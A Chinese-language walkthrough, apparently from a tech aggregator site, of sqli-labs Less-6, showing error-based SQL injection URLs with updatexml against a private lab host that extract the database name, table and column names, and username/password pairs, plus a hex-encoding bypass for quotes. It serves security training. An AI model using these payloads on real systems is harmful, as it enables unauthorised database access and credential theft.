[PHP知识库] sqli-labs靶场Less-6

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> sqli-labs靶场Less-6 -> 正文阅读

[PHP知识库]sqli-labs靶场Less-6

1、访问首页，/Less-6/index.php?id=1，这里的传参点是id

?探测五步

判断是否是数字形传参
判断是否有单引号闭合
判断是否是双引号闭合
判断是否单引号+括号闭合
判断是否是双引号+括号闭合

http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1" and 1=2-- qwe

2、存在SQL注入，但是这里不存在回显点，故意输出错误的SQL，看页面是否报错，如果报错有回显哪么就可以使用报错注入，如果报错也没有回显点哪么就只能使用盲注。

3、?通过报错注入的方式使其库名被当成错误报出来

http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1
" and updatexml(1,concat(0x7e,(select database())),1)-- qwe

?4、获取表名

http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1
" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)),1)-- qwe

5、获取列名

http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1
" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1)),1)-- qwe

-- 如果注入点允许单引号或双引号则把表名加密成16进制即可绕过
http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1
" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1)),1)-- qwe

??通过修改limit参数，依次爆出3个字段 id、username、password

6、获取数据

http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1
" and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 4,1)),1)-- qwe